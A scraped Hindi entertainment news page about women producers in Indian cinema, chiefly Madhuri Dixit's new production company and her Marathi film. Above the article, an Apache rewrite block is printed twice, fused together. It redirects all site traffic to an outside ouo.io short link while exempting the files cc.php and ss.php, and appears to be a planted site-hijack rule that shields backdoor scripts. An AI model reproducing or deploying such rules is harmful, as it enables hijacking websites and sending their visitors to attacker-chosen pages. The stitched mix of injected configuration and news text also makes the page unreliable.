
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 653
Previous Nextमुंबई। जटिलताओं और तमाम पेंचो-ख़म के चलते फ़िल्म निर्माण को अक्सर पुरुषों का काम माना जाता है। मगर, फ़िल्म इंडस्ट्री की शुरुआत से ही स्त्रियां इस धारणा को ग़लत साबित कर रही हैं। 30 और 40 के दशक में ऐसी महिला प्रोड्यूसर मिल जाएंगी, जिन्होंने फ़िल्म निर्माण में पुरुषों के कंधे से कंधा मिलाकर सहयोग किया है। देविका रानी जैसी अभिनेत्रियां पर्दे पर अदाकारी का जलवा दिखाने के साथ पर्दे के पीछे भी प्रोड्यूसर के रोल में बख़ूबी कामयाब रहीं। अभिनेत्रियों के फ़िल्म निर्माण में उतरने का ये सिलसिला आज ना सिर्फ़ जारी है, बल्कि पहले के मुक़ाबले अधिक प्रचलित हो चुका है।
माधुरी दीक्षित ने एक लंबे समय तक पर्दे पर अपनी अदाकारी से दिल धड़काये हैं। अभिनेत्री की लंबी पारी खेलने वाली माधुरी अब प्रोड्यूसर भी बन चुकी हैं। अपने पति डॉ. श्रीराम नेने के साथ मिलकर माधुरी ने फ़िल्म कंपनी शुरू की है, जिसके बैनर तले पहली मराठी फ़िल्म 15 ऑगस्ट का निर्माण शुरू किया है। इसके साथ माधुरी की अभिनय यात्रा भी जारी है। हिंदी सिनेमा में वो टोटल धमाल में नज़र आएंगी तो बकेट लिस्ट के ज़रिए मराठी सिनेमा में बतौर एक्ट्रेस डेब्यू कर रही हैं।